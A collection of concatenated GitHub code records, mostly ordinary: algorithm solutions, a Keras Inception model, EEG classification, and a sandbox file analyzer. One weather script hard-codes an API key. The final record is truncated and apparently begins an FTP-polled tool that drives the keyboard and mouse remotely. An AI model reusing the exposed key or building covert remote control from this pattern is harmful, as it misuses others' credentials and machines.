min_index = minIndex()\n if target >= nums[min_index] and target <= nums[right]: # when to search in the left part to min_index\n return binarySearch(min_index, right)\n elif target >= nums[min_index] and target >= nums[left]: # when to search in the right part to min_index\n return binarySearch(left, min_index)\n return -1 # when nums[right] < target < nums[left]\n\nif __name__ == '__main__':\n print(Solution().search(nums=[4, 5, 6, 7, 0, 1, 2], target=0)) # 4\n print(Solution().search(nums=[4, 5, 6, 7, 0, 1, 2], target=3)) # -1","repo_name":"WestLakeBao/Luyaos-LeetCode-sols-in-Python","sub_path":"033. Search in Rotated Sorted Array.py","file_name":"033. Search in Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34716000822","text":"from tensorflow.keras.layers import Conv2D, MaxPooling2D, Dropout, Activation, \\\n Flatten, Dense, Input, AveragePooling2D, concatenate, BatchNormalization\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.initializers import random_uniform\n\n\nclass BNInception:\n \"\"\"\n Implementation of Inception version 2.\n \"\"\"\n\n def __init__(self, input_shape, classes):\n self.input_shape = input_shape\n self.classes = classes\n\n @staticmethod\n def __1by1_block(X, filters_1by1, strides, initializer=random_uniform):\n \"\"\"\n Implementation of the 3by3 block. This block consist of 1x1 and 3x3 conv layers.\n :param X: input layer\n :param filters_1by1: number of 1x1 filters\n :param strides: size of stride\n :param initializer: to set up the initial weights of a layer. Equals to random uniform initializer\n :return:\n \"\"\"\n\n X_1by1 = None\n\n if filters_1by1 != 0:\n X_1by1 = Conv2D(filters=filters_1by1, kernel_size=strides, strides=(1, 1),\n padding='same', kernel_initializer=initializer())(X)\n X_1by1 = BatchNormalization()(X_1by1)\n X_1by1 = Activation('relu')(X_1by1)\n\n return X_1by1\n\n @staticmethod\n def __3by3_block(X, reduced_filters_3by3, filters_3by3, strides, initializer=random_uniform):\n \"\"\"\n Implementation of the 1by1 block. This block consist of 1x1 layer.\n :param X: input layer\n :param reduced_filters_3by3: number of 1x1 filters for dimensionality reduction\n :param filters_3by3: number of 3x3 filters\n :param strides: size of stride\n :param initializer: to set up the initial weights of a layer. Equals to random uniform initializer\n :return:\n \"\"\"\n\n X_reduced_3by3 = Conv2D(filters=reduced_filters_3by3, kernel_size=(1, 1), strides=(1, 1),\n padding='same', kernel_initializer=initializer())(X)\n X_reduced_3by3 = BatchNormalization()(X_reduced_3by3)\n X_reduced_3by3 = Activation('relu')(X_reduced_3by3)\n\n X_3by3 = Conv2D(filters=filters_3by3, kernel_size=(3, 3), strides=strides,\n padding='same', kernel_initializer=initializer())(X_reduced_3by3)\n X_3by3 = BatchNormalization()(X_3by3)\n X_3by3 = Activation('relu')(X_3by3)\n\n return X_3by3\n\n @staticmethod\n def __3by3_double_block(X, double_reduced_filters_3by3, double_filters_3by3,\n strides, initializer=random_uniform):\n \"\"\"\n Implementation of the double 3by3 block. This block consist of 1x1 and double 3x3 conv layers.\n :param X: input layer\n :param double_reduced_filters_3by3: number of 1x1 filters for dimensionality reduction\n :param double_filters_3by3: number of 3x3 filters for double 3x3 layers\n :param strides: size of stride.\n :param initializer: to set up the initial weights of a layer. Equals to random uniform initializer\n :return:\n \"\"\"\n\n # 1x1 layer\n X_double_reduced_3by3 = Conv2D(filters=double_reduced_filters_3by3, kernel_size=(1, 1),\n strides=(1, 1), padding='same', kernel_initializer=initializer())(X)\n X_double_reduced_3by3 = BatchNormalization()(X_double_reduced_3by3)\n X_double_reduced_3by3 = Activation('relu')(X_double_reduced_3by3)\n\n # first 3x3 layer\n X_double_3by_3 = Conv2D(filters=double_filters_3by3, kernel_size=(3, 3), strides=(1, 1),\n padding='same', kernel_initializer=initializer())(X_double_reduced_3by3)\n X_double_3by_3 = BatchNormalization()(X_double_3by_3)\n X_double_3by_3 = Activation('relu')(X_double_3by_3)\n\n # second 3x3 layer\n X_double_3by_3 = Conv2D(filters=double_filters_3by3, kernel_size=(3, 3), strides=strides,\n padding='same', kernel_initializer=initializer())(X_double_3by_3)\n X_double_3by_3 = BatchNormalization()(X_double_3by_3)\n X_double_3by_3 = Activation('relu')(X_double_3by_3)\n\n return X_double_3by_3\n\n @staticmethod\n def __pooling_block(X, pool_projection, pool_type, strides, initializer=random_uniform):\n \"\"\"\n Implementation of the pooling block. This block consist of pooling and 1x1 layer.\n :param X: input layer\n :param pool_projection: number of 1x1 filters for dimensionality reduction\n :param pool_type: type of pooling layer. max pooling or average pooling\n :param strides: size of stride.\n :param initializer: to set up the initial weights of a layer. Equals to random uniform initializer\n :return:\n \"\"\"\n\n X_pooling = None\n\n if pool_type == 'max':\n X_pooling = MaxPooling2D(pool_size=(3, 3), strides=strides, padding='same')(X)\n elif pool_type == 'avg':\n X_pooling = AveragePooling2D(pool_size=(3, 3), strides=strides, padding='same')(X)\n\n if pool_projection != 0:\n X_pooling = Conv2D(filters=pool_projection, kernel_size=(1, 1), strides=strides,\n activation='relu', padding='same',\n kernel_initializer=initializer())(X_pooling)\n\n X_pooling = BatchNormalization()(X_pooling)\n X_pooling = Activation('relu')(X_pooling)\n\n return X_pooling\n\n def __inception_v2_block(self, X, filters, reduced_filters, pool_type='avg', strides=(1, 1),\n initializer=random_uniform):\n \"\"\"\n This method creates the inception block.\n :param X: input layer\n :param filters: list of the number of filters\n :param reduced_filters: list of the number of 1x1 filters for dimensionality reduction\n :param pool_type: type of pooling layer. max pooling or average pooling\n :param strides: size of stride. For some layers are (2, 2) while for the others are (1, 1)\n :param initializer: to set up the initial weights of a layer. Equals to random uniform initializer\n :return:\n \"\"\"\n\n filters_1by1, filters_3by3, double_filters_3by3 = filters\n reduced_filters_3by3, double_reduced_filters_3by3, pool_projection = reduced_filters\n\n # 1x1 layer\n X_1by1 = self.__1by1_block(X=X, filters_1by1=filters_1by1, strides=strides,\n initializer=initializer)\n\n # 3x3 layer\n X_3by3 = self.__3by3_block(X=X, reduced_filters_3by3=reduced_filters_3by3,\n filters_3by3=filters_3by3,\n strides=strides, initializer=initializer)\n\n # Double 3x3 layers\n X_double_3by_3 = self.__3by3_double_block(X=X,\n double_reduced_filters_3by3=double_reduced_filters_3by3,\n double_filters_3by3=double_filters_3by3,\n strides=strides,\n initializer=initializer)\n\n # max pooling layer\n X_pooling = self.__pooling_block(X=X, pool_projection=pool_projection,\n pool_type=pool_type, strides=strides,\n initializer=random_uniform)\n\n # concatenate layers\n if X_1by1 is None:\n X_concat = concatenate(inputs=[X_3by3, X_double_3by_3, X_pooling])\n else:\n X_concat = concatenate(inputs=[X_1by1, X_3by3, X_double_3by_3, X_pooling])\n\n X_concat = Activation('relu')(X_concat)\n\n return X_concat\n\n def __auxiliary_classifier(self, X, output_name, initializer=random_uniform):\n \"\"\"\n This method creates an auxiliary classifier.\n :param X: input layer\n :param output_name: name of output layer\n :param initializer: to set up the initial weights of a layer. Equals to random uniform initializer\n :return:\n \"\"\"\n\n # Average pooling layer\n X_average_pool = AveragePooling2D(pool_size=(5, 5), strides=(3, 3), padding='valid')(X)\n\n # Convolution layer for dimensionality reduction\n X_conv = Conv2D(filters=128, kernel_size=(1, 1), strides=(1, 1), padding='same',\n kernel_initializer=initializer())(X_average_pool)\n X_conv = BatchNormalization()(X_conv)\n X_conv = Activation('relu')(X_conv)\n\n # Flatten layer\n X_flatten = Flatten()(X_conv)\n\n # FC layer\n X_fc = Dense(units=1024, activation='relu', kernel_initializer=random_uniform())(X_flatten)\n\n # Dropout layer\n X_dropout = Dropout(rate=0.7)(X_fc)\n\n # Auxiliary output layer\n X_aux_output = Dense(units=self.classes, activation='softmax', name=output_name,\n kernel_initializer=random_uniform())(X_dropout)\n\n return X_aux_output\n\n def __call__(self):\n \"\"\"\n Builds the google_net architecture\n :return:\n \"\"\"\n\n X_input = Input((self.input_shape[0], self.input_shape[1], 3))\n\n # Layer 1\n X = Conv2D(filters=64, kernel_size=(7, 7), strides=(2, 2), padding='same',\n kernel_initializer=random_uniform)(X_input)\n X = BatchNormalization()(X)\n X = Activation('relu')(X)\n\n # Layer 2\n X = MaxPooling2D(pool_size=(3, 3), strides=(2, 2), padding='same')(X)\n\n # Layer 3\n X = Conv2D(filters=64, kernel_size=(1, 1), strides=(1, 1), padding='valid',\n kernel_initializer=random_uniform)(X)\n X = BatchNormalization()(X)\n X = Activation('relu')(X)\n\n # Layer 4\n X = Conv2D(filters=192, kernel_size=(3, 3), strides=(1, 1), padding='same',\n kernel_initializer=random_uniform)(X)\n X = BatchNormalization()(X)\n X = Activation('relu')(X)\n\n # Layer 5\n X = MaxPooling2D(pool_size=(3, 3), strides=(2, 2), padding='same')(X)\n\n # Inception 3a\n X = self.__inception_v2_block(X=X, filters=(64, 64, 96), reduced_filters=(64, 64, 32),\n pool_type='avg')\n\n # Inception 3b\n X = self.__inception_v2_block(X=X, filters=(64, 96, 96), reduced_filters=(64, 64, 64),\n pool_type='avg')\n\n # Inception 3c\n X = self.__inception_v2_block(X=X, filters=(0, 160, 96), reduced_filters=(64, 64, 0),\n strides=(2, 2), pool_type='max')\n\n # Inception 4a\n X = self.__inception_v2_block(X=X, filters=(224, 96, 128), reduced_filters=(64, 96, 128),\n pool_type='avg')\n\n # Inception 4b\n X = self.__inception_v2_block(X=X, filters=(192, 128, 128), reduced_filters=(96, 96, 128),\n pool_type='avg')\n\n # Inception 4c\n X = self.__inception_v2_block(X=X, filters=(160, 160, 160), reduced_filters=(128, 128, 128),\n pool_type='avg')\n\n # Inception 4d\n X = self.__inception_v2_block(X=X, filters=(96, 192, 192), reduced_filters=(128, 160, 128),\n pool_type='avg')\n\n # Inception 4e\n X = self.__inception_v2_block(X=X, filters=(0, 192, 256), reduced_filters=(128, 192, 0),\n strides=(2, 2), pool_type='max')\n\n # Inception 5a\n X = self.__inception_v2_block(X=X, filters=(352, 320, 224), reduced_filters=(192, 160, 128),\n pool_type='avg')\n\n # Inception 5b\n X = self.__inception_v2_block(X=X, filters=(352, 320, 224), reduced_filters=(192, 192, 128),\n pool_type='max')\n\n # Layer 17\n X = AveragePooling2D(pool_size=(7, 7), strides=(1, 1), padding='valid')(X)\n X = Flatten()(X)\n\n # Layer 18\n X = Dropout(rate=0.4)(X)\n\n # Layer 19\n X = Dense(units=1000, activation='relu', kernel_initializer=random_uniform())(X)\n\n # Layer 20\n output = Dense(units=self.classes, activation='softmax', name='output',\n kernel_initializer=random_uniform())(X)\n\n # Create model\n model = Model(inputs=X_input, outputs=output)\n\n return model\n","repo_name":"MrRiahi/Convolutional-Neural-Networks-Tensorflow","sub_path":"src/Inceptions/BN_Inception.py","file_name":"BN_Inception.py","file_ext":"py","file_size_in_byte":12401,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"11208776669","text":"order = input().split()\n\nd = 1\nfor i in range(7):\n d *= int(order[i + 1]) - int(order[i])\n\nif d == 1:\n print('ascending')\nelif d == -1:\n print('descending')\nelse:\n print('mixed')\n","repo_name":"jwkweon/BOJ","sub_path":"[2920]음계.py","file_name":"[2920]음계.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25353485310","text":"import torch\nimport numpy as np\n\nfrom config import *\n\nclass Dataloader:\n def __init__(self, data: list, batch_size: int, shuffle: bool = False) -> dict:\n self.data = data\n self.batch_size = batch_size\n self.shuffle = shuffle\n \n def get_padded_sequences(self, lines: list):\n max_line_len = len(max(lines, key=len))\n \n return np.array([[BOS_IDX] + line + [EOS_IDX] + [PAD_IDX] * (max_line_len - len(line))\n for i, line in enumerate(lines)]\n )\n \n def collate_fn(self, batch: list) -> dict:\n \"\"\"\n Return dict with english sentences and arabic sentences\n \"\"\"\n src = []\n trg = []\n for elem in batch:\n src.append(self.data[elem][0])\n trg.append(self.data[elem][1])\n \n in_src = self.get_padded_sequences(src) # padded inputs\n in_trg = self.get_padded_sequences(trg) \n \n return {\"src\": torch.tensor(in_src, dtype=torch.long), \"trg\": torch.tensor(in_trg, dtype=torch.long)}\n\n def __iter__(self):\n num_batches = int(np.ceil(len(self.data) / self.batch_size))\n if self.shuffle:\n perm = torch.randperm(len(self.data))\n for batch_start in range(num_batches):\n \n batch = perm[batch_start * self.batch_size:(batch_start + 1) * self.batch_size]\n yield self.collate_fn(batch)\n else:\n len_data = [i for i in range(len(self.data))]\n for batch_start in range(num_batches):\n batch = len_data[batch_start * self.batch_size:(batch_start + 1) * self.batch_size]\n yield self.collate_fn(batch)\n\n\n def __len__(self):\n \"\"\"\n Return length of dataloader\n \"\"\"\n return int(np.ceil(len(self.data) / self.batch_size))\n ","repo_name":"KristinaRay/english-arabic-nmt-bot","sub_path":"data/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31626143018","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nk = int(input())\n\ndef calc(n):\n s = str(n)\n s_len = len(s)\n dp = [[0] * 12 for _ in range(s_len)]\n dp_o = [[0] * 12 for _ in range(s_len)]\n for i in range(1,int(s[0])):\n dp[0][i+1] = 1\n dp_o[0][int(s[0])+1] = 1\n\n for i in range(0,s_len-1):\n dp[i+1][1] = dp[i][1] + dp[i][2] + 1\n for k in range(2,11):\n dp[i+1][k] = dp[i][k-1] + dp[i][k] +dp[i][k+1] + 1\n dp[i+1][1] -= 1\n\n if(i != s_len-1):\n j_b = int(s[i])\n j_n = int(s[i+1])\n for j in range( max(0,j_b-1), min(9,j_b+1)+1 ):\n if( j < j_n):\n dp[i+1][j+1] += dp[i][j_b+1]\n if(abs(j_n-j_b)<=1):\n dp_o[i+1][j_n+1] += dp_o[i][j_b+1]\n ans = 0\n for i in range(12):\n ans += dp[-1][i] + dp_o[-1][i]\n\n for tmp in dp:\n print(tmp)\n for tmp in dp_o:\n print(tmp)\n\n # print(dp)\n # print(dp_o)\n\n return ans\n\nprint(calc(3234566667))\n","repo_name":"komajun365/competitive_programming","sub_path":"abc/abc161/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72628443687","text":"import requests\r\n\r\nAPI_KEY = \"b7aedb8aa48fb59cf9f6c7eb405f0844\"\r\ncidade = \"Sao Paulo\"\r\nlink = f\"https://api.openweathermap.org/data/2.5/weather?q={cidade}&appid={API_KEY}&lang=pt_br&units=metric\"\r\n\r\nrequisicao = requests.get(link)\r\nrequisicao_dic = requisicao.json()\r\ndescrisao = requisicao_dic[\"weather\"][0]['description']\r\ntemperatura = requisicao_dic['main']['temp']\r\ncidade = requisicao_dic['name']\r\numidade = requisicao_dic['main']['humidity']\r\nprint (cidade ,descrisao, f\"{temperatura}°C\", f\"Umidade relativa do ar {umidade}%\")","repo_name":"Henry0005/Weather-API","sub_path":"Weather Português.py","file_name":"Weather Português.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73435574249","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Rudolf Sandbox\n# version = 0.1\n# author = felicitychou\n# email = felicitychou@hotmail.com\n\n# standard\nimport binascii\nimport hashlib\nimport os\nimport subprocess\nimport sys\nsys.path.append(\"..\")\n\n# third\nimport magic\nimport ssdeep\n\n# self\nfrom utils.ELFParser import ELF\n\nclass BasicAnalyzer(object):\n\n def __init__(self,filepath,logger,conf):\n\n self.filepath = filepath\n self.logger = logger\n self.conf = conf\n self.run()\n\n def run(self):\n\n try:\n # get basic info\n self.filename = os.path.basename(self.filepath)\n self.filetype = magic.from_file(self.filepath)\n self.filesize = int(os.path.getsize(self.filepath))\n # get hash\n self.md5 = self.hash_file('md5')\n self.sha256 = self.hash_file('sha256')\n self.crc32 = self.get_crc32()\n self.ssdeep = self.get_ssdeep()\n\n # get strings\n self.get_strings()\n self.strings = {\"ascii\":self.ascii_strings,\"unicode\":self.unicode_strings}\n\n # get packer info (self.packer)\n self.packer = None\n self.get_packer_info()\n\n # get elf info (self.elf_info)\n if -1 != self.filetype.find('ELF'):\n self.get_elf_info()\n else:\n self.elf_info = None\n except Exception as e:\n self.logger.exception('%s: %s' % (Exception, e))\n\n # output list\n def output(self):\n #return ['filename','filetype','filesize','md5','sha256','crc32','ssdeep','strings','packer','elf_info']\n return {\n 'filename':self.filename,\n 'filetype':self.filetype,\n 'filesize':self.filesize,\n 'md5':self.md5,\n 'sha256':self.sha256,\n 'crc32':self.crc32,\n 'ssdeep':self.ssdeep,\n 'strings':self.strings,\n 'packer':self.packer,\n 'elf_info':self.elf_info,\n }\n\n # get packer info:\n def get_packer_info(self):\n # ELF (UPX)\n cmd = [self.conf[\"UPX_Path\"],\"-q\", \"-t\",self.filepath]\n output = subprocess.getoutput(cmd)\n if -1!=output.find(\"[OK]\"):\n self.packer = \"upx\"\n else:\n self.packer = None\n \n # get elf info\n def get_elf_info(self):\n self.elf_info = {}\n elffile = ELF(self.filepath)\n\n self.elf_info['header'] = elffile.OutputELFHeader()\n self.elf_info['section_headers'] = elffile.OutputELFShdr()\n self.elf_info['segment_headers'] = elffile.OutputELFPhdr()\n\n\n # get strings unicode and ascii \n def get_strings(self):\n # linux return string list\n try:\n self.ascii_strings = subprocess.check_output([\"strings\", \"-a\", self.filepath]).decode().splitlines()\n self.unicode_strings = subprocess.check_output([\"strings\", \"-a\", \"-el\", self.filepath]).decode().splitlines()\n except Exception as e:\n self.logger.exception('%s: %s' % (Exception, e))\n\n # get hash ('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512')\n def hash_file(self, hash_type):\n try:\n hash_handle = getattr(hashlib, hash_type)()\n with open(self.filepath, 'rb') as file:\n hash_handle.update(file.read())\n return hash_handle.hexdigest()\n except Exception as e:\n self.logger.exception('%s: %s' % (Exception, e))\n \n # get crc32\n def get_crc32(self):\n try:\n with open(self.filepath, 'rb') as file:\n return '%x' % (binascii.crc32(file.read()) & 0xffffffff)\n except Exception as e:\n self.logger.exception('%s: %s' % (Exception, e))\n\n # get ssdeep\n def get_ssdeep(self):\n try:\n return ssdeep.hash_from_file(self.filepath)\n except Exception as e:\n self.logger.exception('%s: %s' % (Exception, e))\n","repo_name":"felicitychou/Rudolf","sub_path":"core/basic_analyze.py","file_name":"basic_analyze.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69820552170","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n\nfrom supervised.logistic_regression import LogisticRegression\nfrom supervised.linear_regression import AnalyticalLinearRegression\nfrom utils.preprocessing import add_dummy_feature\n\nseed = 2\nnp.random.seed(seed)\n\nn_samples = 8\n\nX = np.array([i for i in np.linspace(-1, 0, n_samples // 2)] + [i for i in np.linspace(0.5, 1.5, n_samples // 2)])\nX_ = np.array([i for i in np.linspace(-1, 0, n_samples // 2)] +\n [i for i in np.linspace(0.5, 1.5, n_samples // 2)] + [3, 4, 5])\n\ny = np.zeros(n_samples)\ny_ = np.zeros(len(X_))\n\ny[n_samples // 2:] = 1\ny_[n_samples // 2:] = 1\n\nreg1 = AnalyticalLinearRegression()\nreg2 = AnalyticalLinearRegression()\n\nreg1.fit(X[:, None], y)\nreg2.fit(X_[:, None], y_)\n\n\nfig = plt.figure(figsize=(20, 10))\n\nax1 = fig.add_subplot(211)\nax1.set_ylim([-0.2, 1.2])\n\nclass1, = ax1.plot(X[n_samples // 2:], y[n_samples // 2:], \"xg\")\nclass2, = ax1.plot(X[:n_samples // 2], y[:n_samples // 2], \"xr\")\n\ndecision_boundary = (0.5 - reg1.coef_[0]) / reg1.coef_[1]\ndecision, = ax1.plot([decision_boundary, decision_boundary], [-0.5, 1.5], '--')\nax1.plot(X, reg1.predict(X[:, None]), \"b\")\n\nax1.legend([decision, class1, class2], [\"decision boundary\", \"Class 1\", \"Class 2\"])\n\nax2 = fig.add_subplot(212)\nax2.set_ylim([-0.2, 1.2])\n\nclass1, = ax2.plot(X_[n_samples // 2:], y_[n_samples // 2:], \"xg\")\nclass2, = ax2.plot(X_[:n_samples // 2], y_[:n_samples // 2], \"xr\")\ndecision_boundary = (0.5 - reg2.coef_[0]) / reg2.coef_[1]\ndecision, = ax2.plot([decision_boundary, decision_boundary], [-0.5, 1.5], '--')\n\nax2.plot(X_, reg2.predict(X_[:, None]), \"b\")\nax2.legend([decision, class1, class2], [\"decision boundary\", \"Class 1\", \"Class 2\"])\n\nplt.show()\n","repo_name":"ValentinCalomme/skratch","sub_path":"source/visualization/linear_regression_classification.py","file_name":"linear_regression_classification.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"6433596271","text":"########################################\n# 학번 :30120 이름:이화준\n########################################\n# 화일을 학번 이름으로 먼저 저장하세요. 예) 30129김상일\n\n# <문제 1> \n# - 숫자 5개를 입력받고 입력 받은 수 중에서 가장 큰 수를 출력하세요.\n# - 숫자 5개를 입력받는 부분은 for 반복문으로 작성하세요.\n\nmaxnum = 0\nfor i in range(5) :\n a = int(input(\"숫자를 입력해주세요 : \"))\n if a > maxnum :\n maxnum = a\n \nprint(maxnum)\n\nprint('--'*45)\n\n# <문제 2>\n# 1. 생년월일을 다음과 같이 8자리로 입력 받는다.\n# 예) 20031127\n# \n# 2. 입력 받은 생년월일을 다음과 같이 처리해서 출력한다.\n# 예) 2003년 11월 27일\n\nbirth = input(\"생년월일을 8자리로 입력해주세요 : \")\n\nyear = birth[0:4]\nmonth = birth[4:6]\nday = birth[6:8]\n\nprint(\"%s년 %s월 %s일\" %(year, month, day))\n\nprint('--'*45)\n\n# <문제 3> \n# - 다음 조건을 만족하는 프로그램을 작성하세요.\n# - 무한 반복되는 while 문을 사용한다.\n# - 두 수를 입력 받아서 두 수가 같으면 break 문을 사용해 무한 반복문을 종료한다.\n\nd = 1\nwhile d == 1 :\n b= int(input(\"첫번째 정수를 입력해주세요 : \"))\n c= int(input(\"두번째 정수를 입력해주세요 : \"))\n print(\"첫번째 : %3d 두번째 : %3d\" %(b, c))\n if b == c :\n print(\"입력하신 두 정수가 동일하여 반복을 종료합니다.\")\n break\n\nprint('--'*45)\n\n# <문제 4> \n# - 다음 조건을 만족하는 프로그램을 작성하세요.\n# - 1부터 50까지의 수를 출력한다. 단, 3의 배수는 출력하지 않는다.\ne = 1\nfor x in range(50) :\n if e % 3 != 0 :\n print(e)\n e = e + 1\n \n\n\n\n\n","repo_name":"Prime0220/Python","sub_path":"Challenge/20210531_codingtest.py","file_name":"20210531_codingtest.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21464186574","text":"import processing\nimport os\nimport glob\n\nsrc_folder = 'C:/rasters'\ndst_folder = 'C:/output_kml'\n\nif not os.path.exists(dst_folder):\n os.mkdir(dst_folder)\n\nrasters = glob.glob(src_folder + '/*.asc')\n#print (rasters)\n\nfor raster in rasters:\n try:\n dst_name = os.path.splitext(os.path.basename(raster))[0]\n parameters = {\n 'BAND' : 1, \n 'EIGHT_CONNECTEDNESS' : True, \n 'EXTRA' : '',\n 'FIELD' : 'VALUE',\n 'INPUT' : raster,\n 'OUTPUT' : os.path.join(dst_folder,f'{dst_name}_kml.kml')}\n feedback = QgsProcessingFeedback()\n processing.runAndLoadResults('gdal:polygonize',parameters,feedback=feedback)\n except:\n print(\"processing error\")","repo_name":"Juanjolizard/scripts_pyqgis","sub_path":"raster_to_kml.py","file_name":"raster_to_kml.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13874905606","text":"import torch\nimport scipy.io as sio\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nimport torch.optim as optim\nfrom xai_all import CompactCNN\nfrom adhd_classification import data_load\nfrom sklearn.model_selection import train_test_split\n\n#torch.cuda.empty_cache()\n#torch.manual_seed(0)\n\ndef run():\n PATH_DATASET_MAT = r\"C:\\Users\\Ahmed Guebsi\\Downloads\\ADHD_part1\"\n\n x_data, y_data, subIdx = data_load(PATH_DATASET_MAT)\n print(\"suuuuuuub shape\",subIdx.shape)\n print(max(subIdx))\n x_data = np.swapaxes(x_data, 2, 0)\n y_data = np.swapaxes(y_data, 1, 0)\n subIdx = np.swapaxes(subIdx, 1, 0)\n print(y_data[0:600, 1:4])\n print('x_data.shape: ', x_data.shape)\n print('y_data.shape: ', y_data.shape)\n #label.astype(int)\n subIdx.astype(int)\n\n X_train_org, X_test_org, y_train_org, y_test_org = train_test_split(x_data, y_data, test_size=0.2, shuffle=True,random_state=42)\n samplenum = y_data.shape[0]\n label = y_data[:, 0]\n print(\"laaaaaaaaaaabel\",label.shape)\n\n channelnum = 19\n subjnum = 120\n samplelength = 4\n sf = 128\n\n lr = 1e-2\n batch_size = 50\n n_epoch = 6\n\n # ydata contains the label of samples\n ydata = np.zeros(samplenum, dtype=np.longlong)\n\n for i in range(samplenum):\n ydata[i] = label[i]\n\n # only channel 5 is used, which corresponds to the Fz channel\n selectedchan = [5]\n\n # update the xdata and channel number\n xdata = x_data[:, selectedchan, :]\n channelnum = len(selectedchan)\n\n # the result stores accuracies of every subject\n results = np.zeros(subjnum)\n\n # it performs leave-one-subject-out training and classfication\n for i in range(1, subjnum + 1):\n\n # form the training data all subjects except i\n trainindx = np.where(subIdx != i)[0]\n xtrain = xdata[trainindx]\n x_train = xtrain.reshape(xtrain.shape[0], 1, channelnum, samplelength * sf)\n y_train = ydata[trainindx]\n\n # form the testing data subject i\n testindx = np.where(subIdx == i)[0]\n xtest = xdata[testindx]\n x_test = xtest.reshape(xtest.shape[0], 1, channelnum, samplelength * sf)\n y_test = ydata[testindx]\n\n train = torch.utils.data.TensorDataset(torch.from_numpy(x_train), torch.from_numpy(y_train))\n train_loader = torch.utils.data.DataLoader(train, batch_size=batch_size, shuffle=True)\n\n # load the CNN model to deal with 1D EEG signals\n my_net = CompactCNN().double()\n\n optimizer = optim.Adam(my_net.parameters(), lr=lr)\n loss_class = torch.nn.NLLLoss()\n\n for p in my_net.parameters():\n p.requires_grad = True\n\n # train the classifier\n for epoch in range(n_epoch):\n for j, data in enumerate(train_loader, 0):\n inputs, labels = data\n\n input_data = inputs\n class_label = labels\n\n my_net.zero_grad()\n my_net.train()\n\n class_output = my_net(input_data)\n err_s_label = loss_class(class_output, class_label)\n err = err_s_label\n\n err.backward()\n optimizer.step()\n\n # test the results\n my_net.train(False)\n with torch.no_grad():\n x_test = torch.DoubleTensor(x_test)\n answer = my_net(x_test)\n probs = answer.cpu().numpy()\n preds = probs.argmax(axis=-1)\n acc = accuracy_score(y_test, preds)\n\n print(acc)\n results[i - 1] = acc\n\n print('mean accuracy:', np.mean(results))\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"ahmedguebsi/XAI_ADHD_Detection","sub_path":"adhd_deep/loo_cv.py","file_name":"loo_cv.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74392291687","text":"#release_history.py\nimport json\n\nfrom bs4 import BeautifulSoup\nfrom analytic import Analytic\nimport requests\nimport re\n\nclass ReleaseHistory(Analytic):\n\n def analyze(self):\n \"\"\"\n This analytic subclass takes the list of song urls and iterates through them\n scraping the release date of each song from the web page and returning it as an\n integer.\n :return: The\n \"\"\"\n date_dictionary = {}\n for url in self.url_list:\n page = requests.get(url)\n html = BeautifulSoup(page.text, 'html.parser')\n date = html.select('.metadata_unit .metadata_unit-info--text_only')\n if date:\n for i in date:\n i = str(i)\n result = re.findall(r\"\\d{4,}\", i)\n if result:\n year = int(result[0])\n if year in date_dictionary:\n date_dictionary[year] += 1\n else:\n date_dictionary[year] = 1\n return json.dumps(date_dictionary)\n\n\n# s = ''\n# result = re.findall(r\"\\d{4,}\", s)\n# print(result)","repo_name":"jos6654/sicc-song-analytics","sub_path":"analytics/release_history.py","file_name":"release_history.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16417999432","text":"import ftplib\n\n\nimport time\n\n\nglobal oldmsg\nglobal themsg\noldmsg = ''\n\nglobal oldid\nglobal theid\noldid = ''\n\nimport wget\nimport os\nimport keyboard\nimport mouse\nimport autopy\n\n\nglobal downloadedfilepath\n\nglobal status\nstatus = True\n\n\n\nfilename = 'log.txt'\n\nglobal FTPaddress\nFTPaddress = ''\nglobal FTPusername\nFTPusername = ''\nglobal FTPpassword\nFTPpassword = ''\nglobal FTPdestinationdirectoryname\nFTPdestinationdirectoryname = ''\nglobal Addressoflogfileonserver\nAddressoflogfileonserver = ''\n\n\n\n\ndef config():\n global FTPaddress \n global FTPusername\n global FTPpassword\n global FTPdestinationdirectoryname\n global Addressoflogfileonserver\n try:\n \n #first get the FTP credentials\n lines = []\n f = open('config.txt')\n for line in f:\n lines.append(line.rstrip('\\n'))\n f.close()\n \n \n FTPaddress = str(lines[0])\n FTPusername = str(lines[1])\n FTPpassword = str(lines[2])\n FTPdestinationdirectoryname = str(lines[3])\n Addressoflogfileonserver = str(lines[4])\n\n \n \n \n \n \n \n \n #print(FTPaddress + FTPusername + FTPpassword + FTPdestinationdirectoryname + 